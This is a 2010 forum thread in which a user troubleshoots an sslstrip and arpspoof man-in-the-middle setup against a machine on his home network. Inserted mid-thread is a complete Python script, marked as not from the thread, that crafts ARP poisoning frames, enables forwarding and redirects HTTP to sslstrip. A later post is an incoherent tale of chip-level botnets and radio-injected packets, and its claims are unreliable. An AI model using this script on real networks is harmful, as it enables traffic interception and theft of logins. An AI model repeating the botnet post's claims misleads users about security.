Orange Chicken, posted January 30, 2010

Hello everyone. After many issues with ettercap I saw Darren's segment on sslstrip. I noticed he was using one of the Dsniff tools, so I decided to give it a try. I run Ubuntu 9.10 on my laptop and Windows XP on my desktop. The steps I used were the same as Darren's in the show. My shell output for all of this is:

anon@ubuntu:~$ sudo su
[sudo] password for anon:
root@ubuntu:/home/anon# sudo echo "1" > /proc/sys/net/ipv4/ip_forward
root@ubuntu:/home/anon# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
root@ubuntu:/home/anon# arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a
(the same line repeats)

192.168.1.106 is my XP box (victim) and 192.168.1.1 is of course the default gateway. Then I cd to sslstrip's folder ("cd /home/anon/Downloads/sslstrip-0.7") and run it on port 8080 with "python sslstrip.py -l 8080".

So my issue is that when I try to surf the internet on the victim PC I get a "Server not found" page every time. Thanks for the help, guys and gals.

P.S. I don't know if this makes a difference, but just for the heck of it, the router is a Linksys WRT54G. Thanks in advance.
Charles, posted January 30, 2010

Sounds like it's sending all traffic to your laptop instead of the gateway, so it won't be able to get on the internet. Is it able to access other network resources?
Netshroud, posted January 30, 2010

That should work. Grab Wireshark and see what's going on. In particular, look at the HTTP requests and responses on both machines.
Burning Aces, posted February 1, 2010

That won't work. Remove the quotes on:

root@ubuntu:/home/anon# sudo echo "1" > /proc/sys/net/ipv4/ip_forward

Also, ettercap (CLI) > arpspoof.
Orange Chicken (thread author), posted February 1, 2010

I tried removing the quotes from echo "1" > /proc/sys/net/ipv4/ip_forward and I got the same result. I don't really know what I'm looking for when running Wireshark, but to respond newbishly to your suggestion, I'll tell you what I noticed. If I start a torrent on the target machine it is interrupted by arpspoof the same way that HTTP traffic is halted, but in Wireshark I can still see outgoing requests for web pages coming from the target machine. The reason I am using arpspoof is because I've had so many issues trying to use ettercap, so that's out of the question at the moment. I'm anxiously awaiting a Hak5 episode about ettercap to hopefully spur some good forum discussion about common issues with ettercap. Anyway, any other suggestions? Thanks for the ones so far.
Burning Aces, posted February 2, 2010

> I tried removing the quotes from echo "1" > /proc/sys/net/ipv4/ip_forward and I got the same result. I don't really know what I'm looking for when running Wireshark, but to respond newbishly to your suggestion, I'll tell you what I noticed. If I start a torrent on the target machine it is interrupted by arpspoof the same way that HTTP traffic is halted, but in Wireshark I can still see outgoing requests for web pages coming from the target machine. The reason I am using arpspoof is because I've had so many issues trying to use ettercap, so that's out of the question at the moment. I'm anxiously awaiting a Hak5 episode about ettercap to hopefully spur some good forum discussion about common issues with ettercap. Anyway, any other suggestions? Thanks for the ones so far.

Go to the ettercap site or RTFM! ettercap is simple. The best way is to capture an ARP request packet with Wireshark, edit it with hexedit, and then make a script to send the packet every few seconds. Don't be dependent on Hak5 to solve all your issues and teach you everything; get out there and learn it yourself.
Orange Chicken (thread author), posted February 2, 2010

> Go to the ettercap site or RTFM! ettercap is simple. The best way is to capture an ARP request packet with Wireshark, edit it with hexedit, and then make a script to send the packet every few seconds. Don't be dependent on Hak5 to solve all your issues and teach you everything; get out there and learn it yourself.

Burning Aces, my post is not about ettercap, and I have read the manual pages as well as many other sources on ettercap. I can use it, but I receive errors no matter whether I compile it myself or what changes I make to etter.conf. I am a fan of Hak5 and have been for some time, but that does not mean that I get all of my information here; I would simply like some active discussion about it. This, however, is not the thread in which I plan to discuss ettercap. I am interested in solving this arpspoof issue. Thanks for your input, but my issue remains the same.
Burning Aces, posted February 6, 2010

> Burning Aces, my post is not about ettercap, and I have read the manual pages as well as many other sources on ettercap. I can use it, but I receive errors no matter whether I compile it myself or what changes I make to etter.conf. I am a fan of Hak5 and have been for some time, but that does not mean that I get all of my information here; I would simply like some active discussion about it. This, however, is not the thread in which I plan to discuss ettercap. I am interested in solving this arpspoof issue. Thanks for your input, but my issue remains the same.

Learn to make your own packets. As I said, arpspoof is gay. If you wish, I'll show you how to craft your own packets.
Orange Chicken (thread author), posted February 7, 2010

I would very much appreciate a lesson in creating my own packets. Thank you.
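Added example, not code from the thread or from any of its posters: a Python 3 script that does by hand what the first post's `echo 1 > ip_forward` / `iptables ... REDIRECT --to-port 8080` / `arpspoof -i wlan0 -t 192.168.1.106 192.168.1.1` steps do, and that builds the ARP reply frame itself instead of calling arpspoof, which is the "craft your own packets" lesson asked for above. The MAC and IP values come from the arpspoof output in the first post (attacker 0:22:fa:af:3e:a, victim 0:c0:ca:2f:ca:41 / 192.168.1.106, gateway 192.168.1.1, interface wlan0, sslstrip on 8080). The gateway's MAC does not appear anywhere in the thread, so `GATEWAY_MAC` is an assumed placeholder; it is only needed to put the victim's ARP cache back when you press Ctrl-C, which is also what arpspoof does on exit. Building and decoding frames needs nothing special; actually sending them needs root and a Linux AF_PACKET socket.

```python
#!/usr/bin/env python3
"""Hand-crafted ARP cache poisoning plus the sslstrip port redirect (added example).

Values below are the ones in the thread. GATEWAY_MAC is NOT in the thread and is a
placeholder: read the real one with `arp -n 192.168.1.1` on the attacker before
poisoning, otherwise the victim cannot be repaired on exit.
"""
import socket
import struct
import subprocess
import time

ETH_P_ARP = 0x0806
ARP_REPLY = 2
ARP_FMT = "!HHBBH6s4s6s4s"   # htype ptype hlen plen op sha spa tha tpa = 28 bytes

IFACE = "wlan0"
ATTACKER_MAC = "0:22:fa:af:3e:a"           # dsniff prints octets without zero padding
VICTIM_MAC, VICTIM_IP = "0:c0:ca:2f:ca:41", "192.168.1.106"
GATEWAY_MAC, GATEWAY_IP = "00:00:00:00:00:01", "192.168.1.1"   # MAC is an assumed placeholder
SSLSTRIP_PORT = 8080


def mac_bytes(mac):
    """'0:22:fa:af:3e:a' -> six raw bytes; accepts both padded and unpadded octets."""
    octets = [int(o, 16) for o in mac.split(":")]
    if len(octets) != 6:
        raise ValueError("bad MAC: %r" % mac)
    return bytes(octets)


def mac_str(raw):
    return ":".join("%02x" % b for b in raw)


def build_arp_reply(sender_mac, sender_ip, target_mac, target_ip):
    """42-byte Ethernet+ARP frame saying '<sender_ip> is-at <sender_mac>', unicast to target.

    With the thread's values this is byte-for-byte the frame arpspoof logs as
    '0:22:fa:af:3e:a 0:c0:ca:2f:ca:41 0806 42: arp reply 192.168.1.1 is-at 0:22:fa:af:3e:a'.
    """
    eth = struct.pack("!6s6sH", mac_bytes(target_mac), mac_bytes(sender_mac), ETH_P_ARP)
    arp = struct.pack(ARP_FMT, 1, 0x0800, 6, 4, ARP_REPLY,
                      mac_bytes(sender_mac), socket.inet_aton(sender_ip),
                      mac_bytes(target_mac), socket.inet_aton(target_ip))
    return eth + arp


def parse_arp(frame):
    """Decode a frame so you can check what you are about to send (or what Wireshark captured)."""
    if len(frame) < 42:
        raise ValueError("frame too short for Ethernet+ARP")
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETH_P_ARP:
        raise ValueError("ethertype 0x%04x is not ARP" % ethertype)
    _, _, _, _, op, sha, spa, tha, tpa = struct.unpack(ARP_FMT, frame[14:42])
    return {"dst": mac_str(dst), "src": mac_str(src), "op": op,
            "sender_mac": mac_str(sha), "sender_ip": socket.inet_ntoa(spa),
            "target_mac": mac_str(tha), "target_ip": socket.inet_ntoa(tpa)}


def redirect_rule(port, action="-A"):
    """argv for the thread's nat PREROUTING rule; pass action='-D' to delete it again."""
    return ["iptables", "-t", "nat", action, "PREROUTING", "-p", "tcp",
            "--dport", "80", "-j", "REDIRECT", "--to-port", str(port)]


def set_forwarding(on):
    """Same as `echo 1 > /proc/sys/net/ipv4/ip_forward` (quotes or not make no difference)."""
    with open("/proc/sys/net/ipv4/ip_forward", "w") as f:
        f.write("1\n" if on else "0\n")


def poison(iface, interval=2.0):
    """Poison only the victim's cache, like `arpspoof -t victim gateway`; restore on Ctrl-C."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ARP))
    sock.bind((iface, 0))
    lie = build_arp_reply(ATTACKER_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    truth = build_arp_reply(GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP)
    try:
        while True:
            sock.send(lie)
            time.sleep(interval)
    except KeyboardInterrupt:
        for _ in range(3):       # re-arm the victim with the real gateway MAC
            sock.send(truth)
            time.sleep(1)
    finally:
        sock.close()


if __name__ == "__main__":
    set_forwarding(True)
    subprocess.run(redirect_rule(SSLSTRIP_PORT, "-A"), check=True)
    try:
        poison(IFACE)            # run `python sslstrip.py -l 8080` in another shell meanwhile
    finally:
        subprocess.run(redirect_rule(SSLSTRIP_PORT, "-D"), check=False)
        set_forwarding(False)
```

The frame layout is the whole lesson: 14 bytes of Ethernet header (destination, source, ethertype 0x0806) followed by a 28-byte ARP body whose sender fields are the lie (gateway IP, attacker MAC) and whose target fields name the victim. The teardown matters as much as the setup: if the script dies without sending the `truth` frames, the victim keeps routing through a laptop that is no longer forwarding, which looks exactly like the "Server not found" symptom in the first post.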
cabster21, posted February 7, 2010

Can you normally access the internet on your Ubuntu box? It might be something as simple as not having the default gateway set on the Linux machine. Open up a terminal and type in route. If it's not there: route add default gw 192.168.1.1 netmask 255.255.255.0. Assuming you're on that subnet.
Orange Chicken (thread author), posted February 7, 2010

> Can you normally access the internet on your Ubuntu box? It might be something as simple as not having the default gateway set on the Linux machine. Open up a terminal and type in route. If it's not there: route add default gw 192.168.1.1 netmask 255.255.255.0. Assuming you're on that subnet.

Yes, I can normally access the internet on my Ubuntu box. My output for route is:

Kernel IP routing table
Destination     Gateway         Genmask         Flags Metric Ref    Use Iface
192.168.1.0     *               255.255.255.0   U     2      0        0 wlan0
link-local      *               255.255.0.0     U     1000   0        0 wlan0
default         192.168.1.1     0.0.0.0         UG    0      0        0 wlan0

Thanks.
cabster21, posted February 8, 2010

Oh, you're using wireless. I've never tried it; wired, it will work with the steps you've done. Sorry, I know this doesn't solve your problem. But if you're just wanting to see it work, go wired.
lopez1364, posted February 8, 2010

I've read a topic like this a year ago... it's a DDoS attack on Xbox Live accounts. If this happens multiple times, Xbox Live will ban you.
Orange Chicken (thread author), posted February 20, 2010

Thanks guys, I'll give it a try plugged in.
antihacker101, posted February 24, 2010

I can tell you what's going on. The highest priority of the hacker who created the botnet system since Aug 2008 was to make it undetectable. The main botnet is actually a backdoor injected into your motherboard through a chip flaw. If you were to format and install a firewall, you could use Sysinternals' Process Monitor and watch it use both sides of the connection to break through. The hacker injects radio packets from a smartphone through a phone tower to send a request for info on your system. He then uses codes to talk back and forth using cookies and SMTP. If you had the best security, the hacker would create an incoming cookie for which I always choose block/allow/view info. No matter what you choose, the worm intercepts the packets and receives commands from your hacker buddy. The worm in return, if need be, creates an SMTP packet with codes in the subject using dollar signs before and after a word. That is how they mainly talk. When you see ANON scripts or packets, that means that he hijacked your first master boot record. This is where the codes are that he injects into your browser to connect to other sites. When you see the ARP packets, it means that he has hijacked your drivers/firmware/kernel and set it up to run independent of your operating system. You may be pinging as many as 2 or 3 thousand IPs per hour 24/7. The only way to detect it so far (besides your connection being so slow) is to put a router with a good log between your connection and computer. This will show incoming and outgoing. All that is required for this to run is to turn your machine on. And later on, if you get these kernel lags, you probably have another infected machine locally that is turned on, or it seems he may alter timers and threads. When this first started, and this may be how you guys can help me figure it out, you could not even low-level format any hard drive if there was more than one active anywhere on the network.

Now I can't even low-level format any drive. When I used DBAN, it repeatedly mentioned DAV, and of course the access violation (cache (part of the chip hack)) related. I went through my notes and noticed an old message I wrote down while monitoring the worm that said AXEL.DAV = data interface. I would like to know if anyone knows what that is or means. Thanks.
Burning Aces, posted April 3, 2010

> I would very much appreciate a lesson in creating my own packets. Thank you.

OK, PM me some time.